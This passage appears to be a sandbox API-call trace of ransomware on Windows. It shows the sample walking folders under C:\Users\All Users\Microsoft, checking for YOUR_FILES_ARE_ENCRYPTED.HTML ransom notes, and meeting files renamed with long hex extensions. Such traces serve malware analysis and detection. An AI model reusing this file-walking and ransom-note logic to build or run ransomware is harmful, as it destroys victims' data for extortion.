nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.907] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 81 [0169.907] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.907] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbc707e0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbc707e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc96940, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.907] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.907] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 81 [0169.907] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.907] GetProcessHeap () returned 0x270000 [0169.908] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.908] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbc96940, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbc96940, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc96940, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.908] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.908] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbc96940, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbc96940, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc96940, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.908] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0169.909] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\network\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.909] GetProcessHeap () returned 0x270000 [0169.909] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0169.909] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1934ad10, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcbc96940, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc96940, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Office", cAlternateFileName="")) returned 1 [0169.910] GetProcessHeap () returned 0x270000 [0169.910] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.910] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Office" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Office") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Office" [0169.910] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Office", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Office\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Office\\*" [0169.910] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Office\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1934ad10, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcbc96940, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc96940, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0169.910] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1934ad10, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcbc96940, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc96940, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.910] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1934ad10, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x1934ad10, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x1934ad10, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ClickToRunPackageLocker", cAlternateFileName="CLICKT~1")) returned 1 [0169.910] lstrcmpW (lpString1="ClickToRunPackageLocker", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.910] PathFindExtensionW (pszPath="ClickToRunPackageLocker") returned="" [0169.910] lstrlenW (lpString="") returned 0 [0169.910] PathFindExtensionW (pszPath="ClickToRunPackageLocker") returned="" [0169.910] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbc96940, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbc96940, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc96940, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.910] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.910] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbc96940, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbc96940, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc96940, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.910] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0169.910] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Office\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\office\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.911] GetProcessHeap () returned 0x270000 [0169.911] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0169.911] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7c5a92b0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcbd08d60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbd08d60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="OfficeSoftwareProtectionPlatform", cAlternateFileName="OFFICE~1")) returned 1 [0169.911] GetProcessHeap () returned 0x270000 [0169.911] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.912] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform" [0169.912] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\*" [0169.912] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7c5a92b0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcbd08d60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbd08d60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0169.912] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7c5a92b0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcbd08d60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbd08d60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.912] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7d2c0bb0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcbe13700, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbe13700, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Cache", cAlternateFileName="")) returned 1 [0169.912] GetProcessHeap () returned 0x270000 [0169.912] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.912] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache" [0169.912] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*" [0169.913] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7d2c0bb0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcbe13700, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbe13700, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.913] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7d2c0bb0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcbe13700, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbe13700, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.913] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9337e7d0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x9337e7d0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcbe13700, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x13d68, dwReserved0=0x0, dwReserved1=0x60, cFileName="cache.dat.3A13EABE8ED76782B565006BF4AA5900684EFB44BB0B5840529944997F6CB614", cAlternateFileName="CACHED~1.3A1")) returned 1 [0169.913] lstrcmpW (lpString1="cache.dat.3A13EABE8ED76782B565006BF4AA5900684EFB44BB0B5840529944997F6CB614", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.913] PathFindExtensionW (pszPath="cache.dat.3A13EABE8ED76782B565006BF4AA5900684EFB44BB0B5840529944997F6CB614") returned=".3A13EABE8ED76782B565006BF4AA5900684EFB44BB0B5840529944997F6CB614" [0169.913] lstrlenW (lpString=".3A13EABE8ED76782B565006BF4AA5900684EFB44BB0B5840529944997F6CB614") returned 65 [0169.913] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbcbcaa0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbcbcaa0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbcbcaa0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.913] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.913] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbcbcaa0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbcbcaa0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbcbcaa0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.913] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.913] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\cache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.913] GetProcessHeap () returned 0x270000 [0169.914] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.914] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8151b0f0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xd2cc8ee0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xcbded5a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x2ae74a, dwReserved0=0x0, dwReserved1=0x60, cFileName="tokens.dat.C121F1260EB0985AFD094E1B512A9579D109C8CD69782C5212B10AA3C7C50D4B", cAlternateFileName="TOKENS~1.C12")) returned 1 [0169.914] lstrcmpW (lpString1="tokens.dat.C121F1260EB0985AFD094E1B512A9579D109C8CD69782C5212B10AA3C7C50D4B", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.914] PathFindExtensionW (pszPath="tokens.dat.C121F1260EB0985AFD094E1B512A9579D109C8CD69782C5212B10AA3C7C50D4B") returned=".C121F1260EB0985AFD094E1B512A9579D109C8CD69782C5212B10AA3C7C50D4B" [0169.914] lstrlenW (lpString=".C121F1260EB0985AFD094E1B512A9579D109C8CD69782C5212B10AA3C7C50D4B") returned 65 [0169.914] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbcbcaa0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbcbcaa0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbcbcaa0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.915] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.915] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbcbcaa0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbcbcaa0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbcbcaa0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.915] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0169.915] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.915] GetProcessHeap () returned 0x270000 [0169.916] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0169.916] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbed1de0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbed1de0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="RAC", cAlternateFileName="")) returned 1 [0169.916] GetProcessHeap () returned 0x270000 [0169.916] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.916] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC" [0169.916] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\*" [0169.916] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbed1de0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbed1de0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0169.916] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbed1de0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbed1de0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.916] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbce2c00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbce2c00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Outbound", cAlternateFileName="")) returned 1 [0169.916] GetProcessHeap () returned 0x270000 [0169.916] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.916] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound" [0169.917] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound\\*" [0169.917] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbce2c00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbce2c00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.917] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbce2c00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbce2c00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.917] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbce2c00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbce2c00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbce2c00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.917] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.917] FindNextFileW (in: 